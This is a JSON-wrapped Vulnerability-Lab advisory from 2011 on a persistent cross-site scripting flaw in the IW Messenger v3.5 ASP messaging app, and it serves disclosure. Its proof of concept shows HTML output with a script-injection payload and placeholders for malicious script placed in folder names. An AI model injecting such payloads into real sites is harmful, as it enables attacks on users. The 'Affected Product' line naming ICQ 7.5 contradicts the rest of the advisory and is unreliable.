{"sourceData": "Document Title:\r\n===============\r\nIW Messenger v3.5 - Persistent Input Validation Vulnerability\r\n\r\n\r\n\r\nRelease Date:\r\n=============\r\n2011-06-30\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n212\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nIWMessenger \u00e8 un potente sistema di messaggistica differita interamente sviluppato in ASP, rivolto in particolare \r\nalle piccole e medie aziende come supporto a sistemi Intranet gi\u00e0 esistenti o come sostituto della posta elettronica \r\nall interno di una LAN.\r\n\r\n- Interfaccia simile ai pi\u00f9 diffusi programmi di posta elettronica\r\n- Possibilit\u00e0 di definire infinite cartelle personalizzate oltre quelle di default (Posta in arrivo, Posta inviata e Cestino)\r\n- Possibilit\u00e0 di inviare messaggi a uno o pi\u00f9 destinatari, sia in CC che in CCN\r\n- Possibilit\u00e0 di inserire infiniti allegati\r\n- Possibilit\u00e0 di spostare i messaggi tra le varie cartelle, di ordinarli in base a diversi criteri e di cancellarli definitivamente\r\n- Potente editor di testo per il corpo del messaggio, con possibilit\u00e0 di inserire immagini\r\n- Funzioni di reply e forward\r\n- Possibilit\u00e0 di definire una firma personalizzata\r\n- Notifica di nuovi messaggi, utilizzando CDONTS o CDOSYS\r\n- Completo controllo sul Layout della pagina, potendo scegliere ad es. dimensione della pagina e tema (skin)\r\n- Facilit\u00e0 di configurazione: solo 3 cartelle da copiare nella root!\r\n- Compatibile con Windows 2003 Server\r\n- COMPLETA GRATUITA !\r\n\r\n(Copy of the Vendor Homepage: http://ivansweb.com/products/default.asp?iChannel=3&nChannel=Products)\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nVulnerability Lab Team discovered a persistent Input Validation vulnerability on the IW Messenger Application v3.5.x\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nIvansWeb.com\r\nProduct: ICQ 7.5\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nA persistent input validation vulnerability is detected detected on the IW-Messenger application (v3.5).\r\nThe validation vulnerability/bug allows an attacker to inject/implement own malicious persistent script \r\ncodes via invite.\r\n\r\nVulnerable Module(s):\r\n\r\n\t\t\t\t[+] iFolder\r\n\r\nPictures: \r\n\t\t\t\t../1.png\r\n\t\t\t\t../2.png\r\n\t\t\t\t../3.png\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe vulnerability can be exploited by remote attackers. For demonstration or reproduce ...\r\n\r\n<tbody><tr class=\"grid-header\">\r\n <td width=\"1%\">\u00a0</td>\r\n <td width=\"100%\">Cartelle</td>\r\n <td align=\"center\" nowrap=\"nowrap\" width=\"1%\">Da leggere </td>\r\n <td align=\"center\" width=\"1%\">Totale</td>\r\n </tr>\r\n \r\n <tr class=\"grid-main\">\r\n <td align=\"center\"><img src=\"../images/icon_oe_inbox.gif\" border=\"0\"></td>\r\n\r\n <td><a href=\"../messages/messages_listing.asp?iFolder=1\">Posta in arrivo</a> </td>\r\n <td align=\"center\">0</td>\r\n <td align=\"center\">3</td>\r\n </tr>\r\n \r\n <tr class=\"grid-evidence\">\r\n <td align=\"center\"><img src=\"../images/icon_oe_sent.gif\" border=\"0\"></td>\r\n <td><a href=\"../messages/messages_listing.asp?iFolder=2\">Posta inviata</a> </td>\r\n\r\n <td align=\"center\">1</td>\r\n <td align=\"center\">23</td>\r\n </tr>\r\n \r\n <tr class=\"grid-main\">\r\n <td align=\"center\"><img src=\"../images/icon_oe_trash.gif\" border=\"0\"></td>\r\n <td><a href=\"../messages/messages_listing.asp?iFolder=3\">Cestino</a> </td>\r\n <td align=\"center\">0</td>\r\n\r\n <td align=\"center\">1</td>\r\n </tr>\r\n \r\n <tr class=\"grid-main\">\r\n <td align=\"center\"><img src=\"../images/icon_oe_folder.gif\" border=\"0\"></td>\r\n <td><a href=\"../messages/messages_listing.asp?iFolder=8\">\"><script>alert(\"XSS\");</script></a> </td>\r\n <td align=\"center\">0</td>\r\n\r\n <td align=\"center\">0</td>\r\n </tr>\r\n \r\n <tr class=\"grid-main\">\r\n <td align=\"center\"><img src=\"../images/icon_oe_folder.gif\" border=\"0\"></td>\r\n <td><a href=\"../messages/messages_listing.asp?iFolder=9\">\"><MALICIOUS PERSISTENT SCRIPTCODE HERE!!!><img src=\"http://2%3C/a%3E%20%3C/td%3E%0A%20%20%20%20%20%20%20%20%20%20%3Ctd%20align=\" center\"=\"\">0</a></td>\r\n <td align=\"center\">0</td>\r\n\r\n </tr>\r\n \r\n <tr class=\"grid-main\">\r\n <td align=\"center\"><img src=\"../images/icon_oe_folder.gif\" border=\"0\"></td>\r\n <td><a href=\"../messages/messages_listing.asp?iFolder=7\">MALICIOUS PERSISTENT SCRIPTCODE HERE!!!#</a> </td>\r\n <td align=\"center\">0</td>\r\n <td align=\"center\">0</td>\r\n </tr>\r\n\r\n \r\n <tr class=\"grid-main\">\r\n <td align=\"center\"><img src=\"../images/icon_oe_folder.gif\" border=\"0\"></td>\r\n <td><a href=\"../messages/messages_listing.asp?iFolder=6\">temp</a> </td>\r\n <td align=\"center\">0</td>\r\n <td align=\"center\">0</td>\r\n </tr>\r\n \r\n <tr class=\"grid-main\">\r\n\r\n <td align=\"center\"><img src=\"../images/icon_folder.gif\" align=\"middle\" border=\"0\"></td>\r\n <td><a href=\"../messages/folders_listing.asp\">Gestione Cartelle</a> </td>\r\n <td>\u00a0</td>\r\n <td>\u00a0</td>\r\n </tr>\r\n </tbody>\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the persistent input validation vulnerability is estimated as medium.\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability Research Laboratory - Chokri B.A.\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-\r\nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \r\nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \r\nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \r\nmay not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases \r\nor trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t - www.vulnerability-lab.com/register\r\nContact: admin@vulnerability-lab.com \t- support@vulnerability-lab.com \t - research@vulnerability-lab.com\r\nSection: video.vulnerability-lab.com \t- forum.vulnerability-lab.com \t\t - news.vulnerability-lab.com\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t - youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and \r\nother information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), \r\nmodify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.\r\n\r\n \t\t\t\t \tCopyright \u00a9 2012 | Vulnerability Laboratory\r\n\r\n\r\n\r\n", "description": "", "reporter": "Vulnerability Research Laboratory - Chokri B.A.", "href": "http://www.vulnerability-lab.com/get_content.php?id=212", "type": "vulnerlab", "viewCount": 4, "references": [], "lastseen": "2018-03-01T19:13:57", "published": "2011-06-30T00:00:00", "cvelist": [], "id": "VULNERLAB:212", "modified": "2011-06-30T00:00:00", "title": "IW Messenger v3.5 - Persistent Input Validation Vulnerability", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2018-03-01T19:13:57", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-01T19:13:57", "rev": 2}, "vulnersScore": 0.0}, "immutableFields": []}